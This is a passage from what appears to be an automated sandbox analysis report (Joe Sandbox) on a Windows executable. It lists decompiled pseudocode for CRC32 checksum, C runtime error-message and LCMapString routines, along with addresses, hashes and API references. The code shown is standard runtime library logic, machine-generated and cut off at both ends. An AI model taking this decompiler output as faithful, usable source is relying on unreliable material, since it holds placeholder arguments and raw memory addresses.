0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t72 & 0x00000001) - 1) & 0xedb88320 ^ _t72 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
					_t72 = _t72 + 1;
				} while (_t72 < 0x100);
				while(_t72 < 0x800) {
					_t38 =  *(0x4232c0 + _t72 * 4);
					_t72 = _t72 + 1;
					 *(0x4236bc + _t72 * 4) = _t38 >> 0x00000008 ^  *(0x4236c0 + (_t38 & 0x000000ff) * 4);
				}
				 *0x42333c = 0x418fd0;
				_t37 = E00411420();
				if(_t37 == 0) {
					 *0x42333c = 0x418ef0;
					return _t37;
				}
				return _t37;
			}






                                          0x004133d0
                                          0x004133d2
                                          0x00413460
                                          0x00413467
                                          0x00413468
                                          0x0041347a
                                          0x00413480
                                          0x00413499
                                          0x0041349a
                                          0x004134a1
                                          0x004134a9
                                          0x004134b3
                                          0x004134ba
                                          0x004134bc
                                          0x00000000
                                          0x004134bc
                                          0x004134c6

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                                          • Instruction ID: b54c2cd6cfa36051406bb29028bc26d5c271240bfac9ba2f52dccebc7510b76a
                                          • Opcode Fuzzy Hash: 951ce894d9222124d4953917d4d44c2f3af61f07f2abcd4f63f3fcd2ee4f65ae
                                          • Instruction Fuzzy Hash: 52214F3E370D0607A71C8B69AD336B921D2E38430A7C8A03DE68BC53D1EE6CD595860D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00418EF1 Relevance: .1, Instructions: 70COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00418EF1(signed char __ecx, signed int __edx, intOrPtr _a8, intOrPtr _a12) {
				signed char _t42;
				signed int _t44;
				signed int _t50;
				signed int _t51;
				unsigned int _t59;
				signed char _t60;
				signed int _t62;
				void* _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t69;
				signed int _t73;
				signed int _t83;
				intOrPtr _t86;

				_t62 = __edx;
				_t42 = __ecx;
				_t65 = _a8;
				_t86 = _a12;
				if(_t65 != 0) {
					while((_t62 & 0x00000007) != 0) {
						_t83 =  *_t62 & 0x000000ff;
						_t62 = _t62 + 1;
						_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t83 ^ _t42 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t67 = _t65 + _t62;
						_a8 = _t67;
						_t69 = _t67 - 0x00000008 & 0xfffffff8;
						_t63 = _t62 - _t69;
						_t44 = _t42 ^  *(_t63 + _t69);
						_t59 =  *(_t63 + _t69 + 4);
						do {
							_t50 = _t59 & 0x000000ff;
							_t51 = _t59 & 0x000000ff;
							_t60 = _t59 >> 0x10;
							_t59 =  *(_t63 + _t69 + 0xc);
							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
							_t63 = _t63 + 8;
						} while (_t63 != 0);
						_t42 = _t44 ^  *(_t63 + _t69);
						_t62 = _t69;
						_t65 = _a8 - _t62;
						L7:
						while(_t65 != 0) {
							_t73 =  *_t62 & 0x000000ff;
							_t62 = _t62 + 1;
							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t42;
					}
				}
				goto L7;
			}

















                                          0x00418ef1
                                          0x00418ef4
                                          0x00418ef6
                                          0x00418efa
                                          0x00418f00
                                          0x00418f06
                                          0x00418f0e
                                          0x00418f11
                                          0x00418f1a
                                          0x00418f1e
                                          0x00418f1f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00418f1f
                                          0x00418f24
                                          0x00418f2a
                                          0x00418f2c
                                          0x00418f33
                                          0x00418f36
                                          0x00418f38
                                          0x00418f3b
                                          0x00418f40
                                          0x00418f44
                                          0x00418f4e
                                          0x00418f58
                                          0x00418f6f
                                          0x00418f9b
                                          0x00418f9d
                                          0x00418f9d
                                          0x00418fa2
                                          0x00418fa5
                                          0x00418fab
                                          0x00000000
                                          0x00418fad
                                          0x00418fb1
                                          0x00418fb4
                                          0x00418fbd
                                          0x00418fc1
                                          0x00418fc1
                                          0x00418fc8
                                          0x00418fc8
                                          0x00418f24
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                          • Instruction ID: d8f843b74cbd450328ce6fa4395b1e87caa1541ea2f4e00bece6a97874f35350
                                          • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                          • Instruction Fuzzy Hash: 9F21D7329046254BCB42DE6EE4845A7F392FBC437AF23472BED8467290C638E855D6A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00418FCB Relevance: .1, Instructions: 70COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00418FCB(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				signed char _t39;
				signed int _t41;
				signed int _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				signed int _t68;
				signed int _t70;
				signed int _t74;
				intOrPtr _t76;

				_t63 = __edx;
				_t39 = __ecx;
				_t65 = _a4;
				_t76 = _a8;
				if(_t65 != 0) {
					while((_t63 & 0x00000007) != 0) {
						_t74 =  *_t63 & 0x000000ff;
						_t63 = _t63 + 1;
						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
						_t65 = _t65 - 1;
						if(_t65 != 0) {
							continue;
						}
						break;
					}
					if(_t65 >= 0x10) {
						_t66 = _t65 + _t63;
						_a4 = _t66;
						_t68 = _t66 - 0x00000008 & 0xfffffff8;
						_t64 = _t63 - _t68;
						_t41 = _t39 ^  *(_t64 + _t68);
						do {
							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
							_t64 = _t64 + 8;
						} while (_t64 != 0);
						_t39 = _t41 ^  *(_t64 + _t68);
						_t63 = _t68;
						_t65 = _a4 - _t63;
						L8:
						while(_t65 != 0) {
							_t70 =  *_t63 & 0x000000ff;
							_t63 = _t63 + 1;
							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
							_t65 = _t65 - 1;
						}
						return _t39;
					}
				}
				goto L8;
			}













                                          0x00418fcb
                                          0x00418fd4
                                          0x00418fd6
                                          0x00418fda
                                          0x00418fe0
                                          0x00418fe6
                                          0x00418fee
                                          0x00418ff1
                                          0x00418ffa
                                          0x00418ffe
                                          0x00418fff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00418fff
                                          0x00419004
                                          0x0041900a
                                          0x0041900c
                                          0x00419013
                                          0x00419016
                                          0x00419018
                                          0x00419020
                                          0x00419076
                                          0x0041907d
                                          0x0041907d
                                          0x00419082
                                          0x00419085
                                          0x0041908b
                                          0x00000000
                                          0x0041908d
                                          0x00419091
                                          0x00419094
                                          0x0041909d
                                          0x004190a1
                                          0x004190a1
                                          0x004190a8
                                          0x004190a8
                                          0x00419004
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                          • Instruction ID: adcd1020660a0caec7aa531f2501062eb824b7187074cdff0887c6cd02d8138b
                                          • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                          • Instruction Fuzzy Hash: EF21377291442587C701DF1DE4986B7B7E1FFC8319F678B2BD9818B180CA39DC81D690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417836 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 100fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00417836(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x422a58;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x422ae8) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x422a58; // 0x2c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x423348; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x420734 == 1) {
						_t16 = _t54 + 0x422a5c; // 0x41bd2c
						_t56 = _t16;
						_t19 = E004144D0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E00418230( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E004144D0( &_v424) + 1 > 0x3c) {
								_t49 = E004144D0( &_v424) +  &_v424 - 0x3b;
								E004183B0(E004144D0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E00418230( &_v164, "Runtime Error!\n\nProgram: ");
							E00418240( &_v164, _t49);
							E00418240( &_v164, "\n\n");
							_t12 = _t54 + 0x422a5c; // 0x41bd2c
							E00418240( &_v164,  *_t12);
							_t17 = E00418320( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}













                                          0x00417836
                                          0x0041783f
                                          0x00417842
                                          0x00417844
                                          0x00417849
                                          0x0041784d
                                          0x00417850
                                          0x00417856
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417856
                                          0x0041785b
                                          0x0041785e
                                          0x00417864
                                          0x0041786a
                                          0x00417872
                                          0x00417963
                                          0x00417963
                                          0x0041796e
                                          0x00417980
                                          0x00417889
                                          0x0041788f
                                          0x004178ab
                                          0x004178b9
                                          0x004178bf
                                          0x004178c6
                                          0x004178c8
                                          0x004178d8
                                          0x004178f3
                                          0x004178fb
                                          0x00417900
                                          0x00417900
                                          0x0041790f
                                          0x0041791c
                                          0x0041792d
                                          0x00417932
                                          0x0041793f
                                          0x00417955
                                          0x0041795d
                                          0x0041788f
                                          0x00417872
                                          0x00417988

                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
                                          • GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
                                          • WriteFile.KERNEL32(00000000), ref: 00417980
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$HandleModuleNameWrite
                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
                                          • API String ID: 3784150691-2787626558
                                          • Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                                          • Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
                                          • Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                                          • Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041881D Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 61%
                                          			E0041881D(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x41be00);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x423554; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E00418A41(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x423554; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x42354c; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00413CC0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00413CC0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x41bdf8, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x41bdf4, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x423554 = 2;
							goto L5;
						}
					} else {
						 *0x423554 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                                          0x00418820
                                          0x00418822
                                          0x00418827
                                          0x00418832
                                          0x00418833
                                          0x0041883a
                                          0x00418840
                                          0x00418845
                                          0x0041884b
                                          0x00418893
                                          0x00418896
                                          0x0041889e
                                          0x004188a4
                                          0x004188a5
                                          0x004188a5
                                          0x004188a8
                                          0x004188b0
                                          0x004188d2
                                          0x00000000
                                          0x004188d8
                                          0x004188db
                                          0x004188dd
                                          0x004188e2
                                          0x004188e2
                                          0x004188f2
                                          0x00418902
                                          0x00418904
                                          0x00418909
                                          0x00000000
                                          0x0041890f
                                          0x0041890f
                                          0x0041891a
                                          0x0041891f
                                          0x00418924
                                          0x00418927
                                          0x00418943
                                          0x00000000
                                          0x0041895e
                                          0x00418970
                                          0x00418972
                                          0x00418977
                                          0x00000000
                                          0x00418979
                                          0x0041897d
                                          0x004189bf
                                          0x004189ce
                                          0x004189d3
                                          0x004189d6
                                          0x004189d8
                                          0x004189db
                                          0x004189f5
                                          0x00000000
                                          0x00418a0f
                                          0x00418a12
                                          0x00418a13
                                          0x00418a14
                                          0x00418a1a
                                          0x00418a1d
                                          0x00418a16
                                          0x00418a16
                                          0x00418a17
                                          0x00418a17
                                          0x00418a30
                                          0x00418a34
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00418a34
                                          0x0041897f
                                          0x00418982
                                          0x00418a3a
                                          0x00418a3a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00418982
                                          0x0041897d
                                          0x00418977
                                          0x00418943
                                          0x00418909
                                          0x004188b2
                                          0x004188c4
                                          0x004188c4
                                          0x0041884d
                                          0x0041884d
                                          0x0041884e
                                          0x00418851
                                          0x00418867
                                          0x00418883
                                          0x004189ab
                                          0x004189ab
                                          0x00418889
                                          0x00418889
                                          0x00000000
                                          0x00418889
                                          0x00418869
                                          0x00418869
                                          0x00000000
                                          0x00418869
                                          0x00418867
                                          0x004189b3
                                          0x004189be

                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,74CB70F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
                                          • LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
                                          • LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,74CB70F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
                                          • MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,74CB70F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
                                          • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
                                          • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
                                          • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: String$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 352835431-0
                                          • Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                                          • Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
                                          • Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                                          • Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041750F Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041750F() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x423508; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
